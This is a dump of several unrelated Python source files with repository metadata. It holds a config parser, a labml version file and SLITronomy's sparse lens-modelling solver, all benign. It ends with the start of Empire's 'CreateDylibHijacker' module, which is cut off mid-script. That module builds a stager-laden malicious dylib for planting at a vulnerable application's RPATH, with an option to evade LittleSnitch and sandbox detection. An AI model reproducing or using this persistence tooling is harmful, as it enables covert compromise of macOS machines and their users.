'has_default': False},
{'name': 'host', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'port', 'type': 'int', 'default': None, 'require': True,
'has_default': False},
{'name': 'user', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'passwd', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'db', 'type': 'int', 'default': None, 'require': True,
'has_default': False},
],
}
sections['common'] = get_section_val(conf_obj=config, section='common', c_ks=c_keys['common'])
if sections['common']['db_type'] == 'sqlite':
sections['sqlite'] = get_section_val(conf_obj=config, section='sqlite', c_ks=c_keys['sqlite'])
elif sections['common']['db_type'] == 'mysql':
sections['mysql'] = get_section_val(conf_obj=config, section='mysql', c_ks=c_keys['mysql'])
sections['redis'] = get_section_val(conf_obj=config, section='redis', c_ks=c_keys['redis'])
c_args = sections
return c_args
def get_cas_conf(config_file=None):
config = get_conf_obj(config_file=config_file)
sections = {}
c_args = {}
c_keys = {
'common':
[
{'name': 'mama_cas_enable_single_sign_out', 'type': 'boolean', 'default': True, 'require': False,
'has_default': True},
{'name': 'allow_sites', 'type': 'list', 'default': None, 'require': True,
'has_default': False},
{'name': 'deny_sites', 'type': 'list', 'default': None, 'require': True,
'has_default': False},
],
'site':
[
{'name': 'service', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'callbacks', 'type': 'list', 'default': None, 'require': True,
'has_default': False},
{'name': 'logout_allow', 'type': 'boolean', 'default': None, 'require': True,
'has_default': False},
{'name': 'logout_url', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
],
}
sections['common'] = get_section_val(conf_obj=config, section='common', c_ks=c_keys['common'])
allow_sites = []
if 'allow_sites' in sections['common']:
a_sites = sections['common']['allow_sites']
if 'deny_sites' in sections['common']:
d_sites = sections['common']['deny_sites']
allow_sites = list(set(a_sites) - set(d_sites))
else:
allow_sites = a_sites
for s in allow_sites:
sections[s] = get_section_val(conf_obj=config, section=s, c_ks=c_keys['site'])
c_args = sections
return c_args
class GoballOptions(Common):
def __init__(self, *args, **kwargs):
self.trans_type = kwargs.get('trans_type', 'lazy')
self.OPTIONS = {}
self.set_trans(trans_type=self.trans_type)
super(GoballOptions, self).__init__(*args, **kwargs)
def original_output(self, var_s=''):
return var_s
def set_trans(self, **kwargs):
self.trans_type = kwargs.get('trans_type', self.trans_type)
if self.trans_type == 'lazy':
self.trans = ugettext_lazy
elif self.trans_type == 'original':
self.trans = self.original_output
elif self.trans_type == 'immediate':
self.trans = ugettext
else:
self.trans = self.original_output
self.set_options()
def set_option(self, var_name, val):
setattr(self, var_name, val)
self.OPTIONS[var_name] = val
def set_options(self):
self.set_option('INT_CHOICES',
(
(0, self.trans('True')),
(1, self.trans('False')),
)
)
self.set_option('STATUS_CHOICES',
(
(0, self.trans('Valid')),
(1, self.trans('Spare')),
(2, self.trans('Invalid')),
)
)
self.set_option('BOOLEAN_CHOICES',
(
('true', self.trans('true')),
('false', self.trans('false')),
)
)
self.set_option('TBOOLEAN_CHOICES',
(
(True, self.trans('true')),
(False, self.trans('false')),
)
)
self.set_option('TF_CHOICES',
(
(True, self.trans('True')),
(False, self.trans('False')),
)
)
def trans_tuple_to_dict(self, v_tuple):
n_dict = {}
for vv in v_tuple:
n_dict[vv[1]] = vv[0]
return n_dict
def reverse_dict(self, dict={}):
n_dict = {}
for key in dict:
n_dict[dict[key]] = key
return n_dict
def get_option(self, var_name=None):
return getattr(self, var_name)
def get_dict_option(self, var_name=None):
var = getattr(self, var_name)
return self.trans_tuple_to_dict(var)
def get_reverse_dict_option(self, var_name=None):
c_dict = self.get_dict_option(var_name)
n_dict = self.reverse_dict(c_dict)
return n_dict
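    # Hedged usage sketch (assumes the spmo Common base class tolerates these
    # keyword arguments; the values follow set_options() above):
    #
    #   gb = GoballOptions(trans_type='original')
    #   gb.get_option('STATUS_CHOICES')              # ((0, 'Valid'), (1, 'Spare'), (2, 'Invalid'))
    #   gb.get_dict_option('STATUS_CHOICES')         # {'Valid': 0, 'Spare': 1, 'Invalid': 2}
    #   gb.get_reverse_dict_option('STATUS_CHOICES') # {0: 'Valid', 1: 'Spare', 2: 'Invalid'}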
def declare_goball_options(trans_type='lazy'):
GB_OP = GoballOptions(trans_type=trans_type)
for option in GB_OP.OPTIONS:
exec('global %s' % option)
exec('%s = GB_OP.get_option("%s")' % (option, option))
# Declare module-level option variables
declare_goball_options()
| 37.309211
| 113
| 0.515253
|
6a9e79b784b5fce2847d866b7ad311979c5d1d47
| 24
|
py
|
Python
|
client/labml/__init__.py
|
vpj/lab
|
0575be18d1a7c4af67ccbb50a9c87f55de558481
|
[
"MIT"
] | 174
|
2018-11-17T09:05:03.000Z
|
2020-04-17T21:50:47.000Z
|
client/labml/__init__.py
|
vpj/lab
|
0575be18d1a7c4af67ccbb50a9c87f55de558481
|
[
"MIT"
] | 7
|
2019-07-02T23:27:58.000Z
|
2020-04-18T02:50:58.000Z
|
client/labml/__init__.py
|
vpj/lab
|
0575be18d1a7c4af67ccbb50a9c87f55de558481
|
[
"MIT"
] | 21
|
2018-12-05T18:33:49.000Z
|
2020-04-18T03:58:30.000Z
|
__version__ = '0.4.150'
| 12
| 23
| 0.666667
|
4f0db8c58b9946fafc9eccd127dfcc073020a3d9
| 27,166
|
py
|
Python
|
slitronomy/Optimization/solver_base.py
|
austinpeel/SLITronomy
|
2fbd1a910e09c3e24268826a85f1c8684e9ffff0
|
[
"MIT"
] | null | null | null |
slitronomy/Optimization/solver_base.py
|
austinpeel/SLITronomy
|
2fbd1a910e09c3e24268826a85f1c8684e9ffff0
|
[
"MIT"
] | null | null | null |
slitronomy/Optimization/solver_base.py
|
austinpeel/SLITronomy
|
2fbd1a910e09c3e24268826a85f1c8684e9ffff0
|
[
"MIT"
] | null | null | null |
__author__ = 'aymgal'
# class that implements SLIT algorithm
import copy
import numpy as np
from slitronomy.Optimization.model_operators import ModelOperators
from slitronomy.Lensing.lensing_operator import LensingOperator
from slitronomy.Optimization.noise_levels import NoiseLevels
from slitronomy.Util.solver_plotter import SolverPlotter
from slitronomy.Util.solver_tracker import SolverTracker
from slitronomy.Util import util
class SparseSolverBase(ModelOperators):
"""
Base class that generally defines a sparse solver
"""
    #TODO: raise an error when the number of decomposition scales is not consistent with the image size
# (also when reducing source plane size, re-check consistency)
#TODO: create classes for lens and source models.
# E.g. the method project_on_original_grid_source should be attached to some new "SourceModel" class, not to the solver.
def __init__(self, data_class, lens_model_class, image_numerics_class, source_numerics_class,
lens_light_mask=None, source_interpolation='bilinear',
minimal_source_plane=False, use_mask_for_minimal_source_plane=True, min_num_pix_source=20,
min_threshold=3, threshold_increment_high_freq=1, threshold_decrease_type='exponential',
fixed_spectral_norm_source=0.98, include_regridding_error=False,
sparsity_prior_norm=1, force_positivity=True, formulation='analysis',
external_likelihood_penalty=False, random_seed=None,
verbose=False, show_steps=False, thread_count=1):
"""
:param data_class: lenstronomy.imaging_data.ImageData instance describing the data.
:param lens_model_class: lenstronomy.lens_model.LensModel instance describing the lens mass model.
:param image_numerics_class: lenstronomy.ImSim.Numerics.numerics_subframe.NumericsSubFrame instance for image plane.
:param source_numerics_class: lenstronomy.ImSim.Numerics.numerics_subframe.NumericsSubFrame instance for source plane.
:param lens_light_mask: boolean mask with False/0 to exclude pixels that are assumed to contain only lens light flux.
Defaults to None.
:param source_interpolation: type of interpolation of source pixels on the source plane grid.
It can be 'nearest' for nearest-neighbor or 'bilinear' for bilinear interpolation. Defaults to 'bilinear'.
:param minimal_source_plane: if True, reduce the source plane grid size to the minimum set by min_num_pix_source.
Defaults to False.
:param use_mask_for_minimal_source_plane: if True, use the likelihood_mask to compute minimal source plane.
Defaults to True.
:param min_num_pix_source: minimal number of pixels on a side of the square source grid.
Only used when minimal_source_plane is True. Defaults to 20.
:param min_threshold: in unit of the noise (sigma), minimum threshold for wavelets denoising.
Typically between 3 (more conservative thresholding) and 5 (more aggressive thresholding). Defaults to 3.
:param threshold_increment_high_freq: additive number to the threshold level (in unit of the noise) for the highest frequencies on wavelets space.
Defaults to 1.
:param threshold_decrease_type: strategy for decreasing the threshold level at each iteration. Can be 'none' (no decrease, directly sets to min_threshold), 'linear' or 'exponential'.
Defaults to None, which is 'exponential' for the source-only solver, 'linear' for the source-lens solver.
:param fixed_spectral_norm_source: if None, update the spectral norm for the source operator, for optimal gradient descent step size.
Defaults to 0.98, which is a conservative value typical of most lens models.
:param sparsity_prior_norm: prior l-norm (0 or 1). If 1, l1-norm and soft-thresholding are applied.
If 0, it is l0-norm and hard-thresholding. Defaults to 1.
:param force_positivity: if True, apply positivity constraint to the source flux.
Defaults to True.
:param formulation: type of formalism for the minimization problem. 'analysis' solves the problem in direct space.
            'synthesis' solves the problem in wavelets space. Defaults to 'analysis'.
:param external_likelihood_penalty: if True, the solve() method returns a non-zero penalty,
e.g. for penalize more a given lens model during lens model optimization. Defaults to False.
:param random_seed: seed for random number generator, used to initialise the algorithm. None for no seed.
Defaults to None.
:param verbose: if True, prints statements during optimization.
Defaults to False.
:param show_steps: if True, displays plot of the reconstructed light profiles during optimization.
Defaults to False.
:param thread_count: number of threads (multithreading) to speedup wavelets computations (only works if pySAP is properly installed).
Defaults to 1.
"""
num_pix_x, num_pix_y = data_class.num_pixel_axes
if num_pix_x != num_pix_y:
raise ValueError("Only square images are supported")
image_grid_class = image_numerics_class.grid_class
source_grid_class = source_numerics_class.grid_class
lensing_operator_class = LensingOperator(lens_model_class, image_grid_class, source_grid_class, num_pix_x,
lens_light_mask=lens_light_mask,
minimal_source_plane=minimal_source_plane, min_num_pix_source=min_num_pix_source,
use_mask_for_minimal_source_plane=use_mask_for_minimal_source_plane,
source_interpolation=source_interpolation, verbose=verbose)
super(SparseSolverBase, self).__init__(data_class, lensing_operator_class, image_numerics_class,
fixed_spectral_norm_source=fixed_spectral_norm_source,
thread_count=thread_count, random_seed=random_seed)
# engine that computes noise levels in image / source plane, in wavelets space
self.noise = NoiseLevels(data_class, subgrid_res_source=source_grid_class.supersampling_factor,
include_regridding_error=include_regridding_error)
# threshold level k_min (in units of the noise)
self._k_min = min_threshold
if threshold_increment_high_freq < 0:
raise ValueError("threshold_increment_high_freq cannot be negative")
else:
self._increm_high_freq = threshold_increment_high_freq
# strategy to decrease threshold up to the max threshold above
if threshold_decrease_type not in ['none', 'lin', 'linear', 'exp', 'exponential']:
raise ValueError("threshold_decrease_type must be in ['none', 'lin', 'linear', 'exp', 'exponential']")
self._threshold_decrease_type = threshold_decrease_type
if sparsity_prior_norm not in [0, 1]:
raise ValueError("Sparsity prior norm can only be 0 or 1 (l0-norm or l1-norm)")
self._sparsity_prior_norm = sparsity_prior_norm
self._formulation = formulation
self._force_positivity = force_positivity
self._external_likelihood_penalty = external_likelihood_penalty
self._verbose = verbose
self._show_steps = show_steps
self._tracker = SolverTracker(self, verbose=verbose)
self._plotter = SolverPlotter(self, show_now=True)
def set_likelihood_mask(self, mask=None):
self._set_likelihood_mask(mask)
# fill masked pixels with background noise
self.fill_masked_data(self.noise.background_rms)
def solve(self, kwargs_lens, kwargs_source, kwargs_lens_light=None, kwargs_ps=None, kwargs_special=None,
init_lens_light_model=None, init_ps_model=None):
"""
Main method to call from outside the class; it calls self._solve().
Any class that inherits SparseSolverBase should have self._ready() and self._solve() methods implemented,
with the correct outputs.
"""
if not self._ready(): return
# update lensing operator and noise levels
self.prepare_solver(kwargs_lens, kwargs_source, kwargs_lens_light=kwargs_lens_light,
kwargs_special=kwargs_special, init_lens_light_model=init_lens_light_model, init_ps_model=init_ps_model)
# call solver
image_model, coeffs_source, coeffs_lens_light, amps_ps \
= self._solve(kwargs_lens=kwargs_lens, kwargs_ps=kwargs_ps, kwargs_special=kwargs_special)
# concatenate optimized parameters (wavelets coefficients, point source amplitudes)
all_param = np.concatenate([coeffs_source, coeffs_lens_light, amps_ps])
#WIP
if self._external_likelihood_penalty:
if self.no_lens_light:
logL_penalty = self.regularization(S=self.source_model)
else:
logL_penalty = self.regularization(S=self.source_model, HG=self.lens_light_model)
else:
logL_penalty = 0
return image_model, all_param, logL_penalty
def _solve(self, kwargs_lens=None, kwargs_ps=None, kwargs_special=None):
raise ValueError("This method must be implemented in class that inherits SparseSolverBase")
def _ready(self):
raise ValueError("This method must be implemented in class that inherits SparseSolverBase")
@property
def track(self):
return self._tracker.track
@property
def component_names(self):
return 'S', 'HG', 'P'
@property
def prior_l_norm(self):
return self._sparsity_prior_norm
def plot_results(self, **kwargs):
return self._plotter.plot_results(**kwargs)
def plot_source_residuals_comparison(self, *args, **kwargs):
return self._plotter.plot_source_residuals_comparison(*args, **kwargs)
@property
def source_model(self):
if not hasattr(self, '_source_model'):
raise ValueError("You must run the optimization before accessing the source estimate")
return self._source_model
@property
def lens_light_model(self):
if not hasattr(self, '_lens_light_model') and not self.no_lens_light:
raise ValueError("You must run the optimization before accessing the lens estimate")
if self.no_lens_light:
return None
return self._lens_light_model
@property
def point_source_model(self):
if not hasattr(self, '_ps_model') and not self.no_point_source:
raise ValueError("You must run the optimization before accessing the point source estimate")
if self.no_point_source:
return None
return self._ps_model
def image_model(self, unconvolved=False):
if self.no_lens_light and self.no_point_source:
S = self.source_model
if unconvolved:
return self.F(S)
return self.H(self.R(self.F(S)))
elif not self.no_point_source:
S, P = self.source_model, self.point_source_model
if unconvolved:
raise ValueError("Deconvolution is only supported for source light")
return self.H(self.R(self.F(S))) + P
else:
S, HG = self.source_model, self.lens_light_model
if unconvolved:
raise ValueError("Deconvolution is only supported for source light")
return self.H(self.R(self.F(S))) + HG
@property
def normalized_residuals_model(self):
""" returns ( HFS + HG + P - Y ) / sigma """
return self.normalized_residuals(S=self.source_model,
HG=self.lens_light_model,
P=self.point_source_model)
@property
def residuals_model(self):
""" returns ( HFS + HG + P - Y ) """
return self.residuals(S=self.source_model,
HG=self.lens_light_model,
P=self.point_source_model)
def generate_initial_source(self):
num_pix = self.num_pix_source
transform = self.Phi_T_s
return util.generate_initial_guess_simple(num_pix, transform, self.noise.background_rms, seed=self.random_seed)
def generate_initial_lens_light(self):
num_pix = self.num_pix_image
transform = self.Phi_T_l
return util.generate_initial_guess_simple(num_pix, transform, self.noise.background_rms, seed=self.random_seed)
def apply_image_plane_mask(self, image_2d):
return self.M(image_2d)
def apply_source_plane_mask(self, source_2d):
return self.M_s(source_2d)
def project_on_original_grid_source(self, source):
return self.lensingOperator.sourcePlane.project_on_original_grid(source)
def psf_convolution(self, array_2d):
return self.H(array_2d)
@property
def num_data_points(self):
"""
number of effective data points (= number of unmasked pixels)
"""
return int(np.sum(self._mask))
@property
def best_fit_reduced_chi2(self):
return self.reduced_chi2(S=self.source_model,
HG=self.lens_light_model,
P=self.point_source_model)
@property
def best_fit_mean_squared_error(self):
return self.mean_squared_error(S=self.source_model,
HG=self.lens_light_model,
P=self.point_source_model)
def loss(self, S=None, HG=None, P=None):
""" returns f = || Y - HFS - HG - P ||^2_2 """
model = self.model_analysis(S=S, HG=HG, P=P)
error = self.effective_image_data - model
norm_error = np.linalg.norm(error.flatten(), ord=2) # flatten to ensure L2-norm
return 0.5 * norm_error**2
def regularization(self, S=None, HG=None, P=None):
""" returns p = lambda * || W_S ø alpha_S ||_0,1 + lambda * || W_HG ø alpha_HG ||_0,1 """
if S is not None:
reg_S = self._regularization(S, self.Phi_T_s, self.M_s, self.noise.levels_source)
else:
reg_S = 0
if HG is not None:
reg_HG = self._regularization(HG, self.Phi_T_l, self.M, self.noise.levels_image)
else:
reg_HG = 0
return reg_S + reg_HG
def _regularization(self, image, transform, mask_func, noise_levels):
lambda_ = np.copy(noise_levels)
lambda_[0, :, :] *= (self._k_min + self._increm_high_freq)
lambda_[1:, :, :] *= self._k_min
alpha_image = mask_func(transform(image))
norm_alpha = np.linalg.norm((lambda_ * alpha_image).flatten(), ord=self._sparsity_prior_norm)
return norm_alpha
def residuals(self, S=None, HG=None, P=None):
model = self.model_analysis(S=S, HG=HG, P=P)
return model - self.effective_image_data
def normalized_residuals(self, S=None, HG=None, P=None):
""" returns ( HFS + HG + P - Y ) / sigma """
residuals = self.residuals(S=S, HG=HG, P=P)
if hasattr(self, '_ps_error'):
sigma = self.noise.effective_noise_map + self._ps_error
else:
sigma = self.noise.effective_noise_map
return self.M(residuals / sigma)
def reduced_chi2(self, S=None, HG=None, P=None):
red_res = self.normalized_residuals(S=S, HG=HG, P=P)
chi2 = np.sum(red_res**2)
return chi2 / self.num_data_points
def mean_squared_error(self, S=None, HG=None, P=None):
res = self.residuals(S=S, HG=HG, P=P)
return np.sum(res**2) / self.num_data_points
@staticmethod
def norm_diff(S1, S2):
""" returns || S1 - S2 ||_2 """
diff = S1 - S2
return np.linalg.norm(diff.flatten(), ord=2) # flatten to ensure L2-norm
def model_analysis(self, S=None, HG=None, P=None):
model = 0
if S is not None:
model += self.H(self.R(self.F(S)))
if HG is not None:
model += self.R(HG)
if P is not None:
model += P
return model
def model_synthesis(self, alpha_S=None, alpha_HG=None, P=None):
model = 0
if alpha_S is not None:
model = self.H(self.R(self.F(self.Phi_s(alpha_S))))
if alpha_HG is not None:
model += self.R(self.Phi_l(alpha_HG))
if P is not None:
model += P
return model
def gradient_loss_source(self, array_S):
if self._formulation == 'analysis':
return self._gradient_loss_analysis_source(S=array_S)
elif self._formulation == 'synthesis':
return self._gradient_loss_synthesis_source(alpha_S=array_S)
def gradient_loss_lens(self, array_HG):
if self._formulation == 'analysis':
return self._gradient_loss_analysis_lens(HG=array_HG)
elif self._formulation == 'synthesis':
return self._gradient_loss_synthesis_lens(alpha_HG=array_HG)
def proximal_sparsity_source(self, array, threshold, weights):
if self._formulation == 'analysis':
return self._proximal_sparsity_analysis_source(array, threshold, weights)
elif self._formulation == 'synthesis':
return self._proximal_sparsity_synthesis_source(array, threshold, weights)
def proximal_sparsity_lens(self, array, threshold, weights):
if self._formulation == 'analysis':
return self._proximal_sparsity_analysis_lens(array, threshold, weights)
elif self._formulation == 'synthesis':
return self._proximal_sparsity_synthesis_lens(array, threshold, weights)
def subtract_source_from_data(self, S):
"""Update "effective" data by subtracting the input source light estimation"""
source_model = self.model_analysis(S=S, HG=None)
self.subtract_from_data(source_model)
def subtract_lens_from_data(self, HG):
"""Update "effective" data by subtracting the input (convolved) lens light estimation"""
lens_model = self.model_analysis(S=None, HG=HG)
self.subtract_from_data(lens_model)
def subtract_point_source_from_data(self, P):
"""Update "effective" data by subtracting the input (convolved) lens light estimation"""
self.subtract_from_data(P)
@property
def algorithm(self):
if self._formulation == 'analysis':
return 'FB'
elif self._formulation == 'synthesis':
return 'FISTA'
def prepare_solver(self, kwargs_lens, kwargs_source, kwargs_lens_light=None,
kwargs_special=None, init_lens_light_model=None, init_ps_model=None):
"""
Update state of the solver : operators, noise levels, ...
The order of the following updates matters!
"""
_, _ = self.lensingOperator.update_mapping(kwargs_lens, kwargs_special=kwargs_special)
if self.noise.include_regridding_error is True:
magnification_map = self.lensingOperator.magnification_map(kwargs_lens)
self.noise.update_regridding_error(magnification_map)
self._prepare_source(kwargs_source)
if not self.no_lens_light:
# TODO: support upsampling/downsampling operator for image plane noise levels
self._prepare_lens_light(kwargs_lens_light)
# lens light initial model, if any
self._init_lens_light_model = init_lens_light_model
# point source initial model, if any
if not self.no_point_source and init_ps_model is None:
raise ValueError("A rough point source model is required to optimize point source amplitudes")
self._init_ps_model = init_ps_model
def _prepare_source(self, kwargs_source):
"""
updates source number of decomposition scales, spectral norm and noise levels
related to the operator H(F(Phi_T_s( . )))
"""
# update number of decomposition scales
n_scales_new = kwargs_source[0]['n_scales']
if n_scales_new == -1:
num_pix_source = self.lensingOperator.sourcePlane.num_pix
n_scales_new = int(np.log2(num_pix_source))
if self._verbose:
print("Set number of source scales to maximal value J={}".format(n_scales_new))
self.set_source_wavelet_scales(n_scales_new)
# update spectral norm of operators
self.update_spectral_norm_source()
# update wavelets noise levels in source plane
self.update_source_noise_levels()
def _prepare_lens_light(self, kwargs_lens_light):
"""
updates lens light number of decomposition scales, spectral norm and noise levels
related to the operator Phi_T_l( . )
Spectral norm and noise levels related to the Phi_T_l operator
are not updated if the number of decomposition scales has not changed
"""
# get n_scales for lens light before update
n_scales_old = self.n_scales_lens_light
n_scales_new = kwargs_lens_light[0]['n_scales']
if n_scales_new == -1:
num_pix_image = self.lensingOperator.imagePlane.num_pix
n_scales_new = int(np.log2(num_pix_image))
if self._verbose:
print("Set number of lens light scales to maximal value J={}".format(n_scales_new))
# update number of decomposition scales
self.set_lens_wavelet_scales(n_scales_new)
if n_scales_old is None or n_scales_new != n_scales_old:
# update spectral norm of operators
self.update_spectral_norm_lens()
# update wavelets noise levels in image plane
self.update_image_noise_levels()
def update_source_noise_levels(self):
self.noise.update_source_levels(self.num_pix_image, self.num_pix_source,
self.Phi_T_s, self.F_T, self.R_T,
psf_kernel=self.psf_kernel)
def update_image_noise_levels(self):
self.noise.update_image_levels(self.num_pix_image, self.Phi_T_l)
def _update_weights(self, alpha_S, alpha_HG=None, threshold=None):
lambda_S = np.copy(self.noise.levels_source)
if threshold is None:
threshold = self._k_min
lambda_S[1:, :, :] *= threshold
lambda_S[0, :, :] *= (threshold + self._increm_high_freq)
weights_S = 1. / ( 1 + np.exp(10 * (alpha_S - lambda_S)) ) # fixed Eq. (C.1)
if alpha_HG is not None:
lambda_HG = np.copy(self.noise.levels_image)
lambda_HG[1:, :, :] *= threshold
lambda_HG[0, :, :] *= (threshold + self._increm_high_freq)
weights_HG = 1. / ( 1 + np.exp(10 * (alpha_HG - lambda_HG)) ) # fixed Eq. (C.1)
else:
weights_HG = None
return weights_S, weights_HG
def _estimate_threshold_source(self, data, fraction=0.9):
"""
estimate maximum threshold, in units of noise, used for thresholding wavelets
coefficients during optimization
Parameters
----------
data : array_like
Imaging data.
fraction : float, optional
From 0 to 1, fraction of the maximum value of the image in transformed space, normalized by noise, that is returned as a threshold.
Returns
-------
float
Threshold level.
"""
if self._threshold_decrease_type == 'none':
return self._k_min
noise_no_coarse = self.noise.levels_source[:-1, :, :]
# compute threshold wrt to the source component
coeffs = self.Phi_T_s(self.F_T(self.R_T(self.H_T(data))))
coeffs_no_coarse = coeffs[:-1, :, :]
coeffs_norm = self.M_s(coeffs_no_coarse / noise_no_coarse)
coeffs_norm[noise_no_coarse == 0] = 0
return fraction * np.max(coeffs_norm)  # return a fraction of the max value, so that only the highest coefficients can enter the solution
def _estimate_threshold_MOM(self, data_minus_HFS, data_minus_HG=None):
"""
Follows a mean-of-maximum strategy (MOM) to estimate thresholds for blind source separation with two components,
typically in a problem solved through morphological component analysis (see Bobin et al. 2007).
Note that we compute the MOM in image plane, even for the source component.
Parameters
----------
data_minus_HFS : array_like
2D array of the imaging data with lensed convolved source subtracted.
data_minus_HG : array_like, optional
2D array of the imaging data with convolved lens light subtracted.
Returns
-------
float
Estimated threshold in the sense of the MOM.
"""
if self._threshold_decrease_type == 'none':
return self._k_min
noise_no_coarse = self.noise.levels_image[:-1, :, :]
coeffs1_no_coarse = self.Phi_T_l(self.R_T(data_minus_HFS))[:-1, :, :]
coeffs1_norm = self.M(coeffs1_no_coarse / noise_no_coarse)
coeffs1_norm[noise_no_coarse == 0] = 0
max_HFS = np.max(np.abs(coeffs1_norm))
if data_minus_HG is not None:
coeffs2_no_coarse = self.Phi_T_l(self.R_T(data_minus_HG))[:-1, :, :]
coeffs2_norm = self.M(coeffs2_no_coarse / noise_no_coarse)
coeffs2_norm[noise_no_coarse == 0] = 0
max_HG = np.max(np.abs(coeffs2_norm))
else:
max_HG = max_HFS
maxs = np.array([max_HFS, max_HG])
return maxs.min() + 0.001 * np.abs(max_HFS - max_HG) # SLIT_MCA version
# return maxs.min() - 0.01 * ( maxs.max() - maxs.min() ) # MuSCADeT version
# return np.mean(maxs) # original mean-of-max from Bobin et al. 2007
def _update_threshold(self, k, k_init, n_iter, n_iter_fix=5):
"""Computes a exponentially decreasing value, for a given loop index, starting at a specified value.
Parameters
----------
k : float
Current threshold.
k_init : float
Threshold value at iteration 0.
n_iter : int
Total number of iterations.
n_iter_fix : int, optional
Number of iterations for which the threshold is held at its minimum set value `self._k_min`.
Defaults to 5.
Returns
-------
float
Decreased threshold, corresponding to the type of decrease.
"""
if self._threshold_decrease_type == 'none':
return self._k_min
elif self._threshold_decrease_type in ['lin', 'linear']:
return util.linear_decrease(k, k_init, self._k_min, n_iter, n_iter_fix)
elif self._threshold_decrease_type in ['exp', 'exponential']:
return util.exponential_decrease(k, k_init, self._k_min, n_iter, n_iter_fix)
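# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original class): a standalone threshold
# schedule reproducing the qualitative behaviour that `_update_threshold`
# delegates to `util.linear_decrease` / `util.exponential_decrease`: the
# threshold goes from `k_init` down to `k_min` over `n_iter` iterations and is
# held at the minimum for the last `n_iter_fix` iterations. The exact formulas
# in `util` may differ; this function and its name are assumptions for
# demonstration only (it assumes k_init >= k_min > 0).
def _example_threshold_schedule(k_init, k_min, n_iter, n_iter_fix=5,
                                decrease_type='exponential'):
    import numpy as np
    n_decrease = max(n_iter - n_iter_fix, 1)
    steps = np.arange(n_iter, dtype=float)
    if decrease_type == 'linear':
        # straight line from k_init to k_min, then constant at k_min
        schedule = k_init + (k_min - k_init) * np.minimum(steps / n_decrease, 1.0)
    else:  # 'exponential'
        # geometric decay reaching k_min after n_decrease iterations
        rate = np.log(k_min / k_init) / n_decrease
        schedule = np.maximum(k_init * np.exp(rate * steps), k_min)
    return schedule
# e.g. _example_threshold_schedule(10., 3., n_iter=20) starts at 10 and stays
# at 3 for the last 5 iterations.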
| 46.837931
| 190
| 0.656666
|
fa0c22c19de3e9b156049b11657468f5940684d4
| 17,828
|
py
|
Python
|
lib/modules/python/persistence/osx/CreateHijacker.py
|
Strazzom/Empire
|
9f519bc45b3b5a203f77d8c00b07499157c307ad
|
[
"BSD-3-Clause"
] | 230
|
2017-03-01T22:29:59.000Z
|
2022-03-27T17:41:59.000Z
|
lib/modules/python/persistence/osx/CreateHijacker.py
|
Strazzom/Empire
|
9f519bc45b3b5a203f77d8c00b07499157c307ad
|
[
"BSD-3-Clause"
] | 9
|
2017-03-05T17:01:46.000Z
|
2018-04-22T21:05:25.000Z
|
lib/modules/python/persistence/osx/CreateHijacker.py
|
Strazzom/Empire
|
9f519bc45b3b5a203f77d8c00b07499157c307ad
|
[
"BSD-3-Clause"
] | 47
|
2017-04-04T18:25:37.000Z
|
2021-09-27T22:48:35.000Z
|
import base64
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'CreateDylibHijacker',
# list of one or more authors for the module
'Author': ['@patrickwardle,@xorrior'],
# more verbose multi-line description of the module
'Description': ('Configures an Empire dylib for use in a Dylib hijack, given the path to a legitimate dylib of a vulnerable application. The architecture of the dylib must match the target application. The configured dylib will be copied locally to the hijackerPath'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
'NeedsAdmin' : True,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
'comment',
'https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'Arch' : {
'Description' : 'Arch: x86/x64',
'Required' : True,
'Value' : 'x86'
},
'SafeChecks' : {
'Description' : 'Switch. Checks for LittleSnitch or a SandBox and exits the staging process if either is found. Defaults to True.',
'Required' : True,
'Value' : 'True'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'LegitimateDylibPath' : {
'Description' : 'Full path to the legitimate dylib of the vulnerable application',
'Required' : True,
'Value' : ''
},
'VulnerableRPATH' : {
'Description' : 'Full path to where the hijacker should be planted. This will be the RPATH in the Hijack Scanner module.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# the Python script itself, with the command to invoke
# for execution appended to the end. Scripts should output
# everything to the pipeline for proper parsing.
#
# the script should be stripped of comments, with a link to any
# original reference script included in the comments.
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
safeChecks = self.options['SafeChecks']['Value']
arch = self.options['Arch']['Value']
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', userAgent=userAgent, safeChecks=safeChecks)
launcher = launcher.strip('echo').strip(' | python &').strip("\"")
dylibBytes = self.mainMenu.stagers.generate_dylib(launcherCode=launcher, arch=arch, hijacker='true')
encodedDylib = base64.b64encode(dylibBytes)
dylib = self.options['LegitimateDylibPath']['Value']
vrpath = self.options['VulnerableRPATH']['Value']
script = """
from ctypes import *
def run(attackerDYLIB):
import ctypes
import io
import os
import sys
import fcntl
import shutil
import struct
import stat
LC_REQ_DYLD = 0x80000000
LC_LOAD_WEAK_DYLIB = LC_REQ_DYLD | 0x18
LC_RPATH = (0x1c | LC_REQ_DYLD)
LC_REEXPORT_DYLIB = 0x1f | LC_REQ_DYLD
(
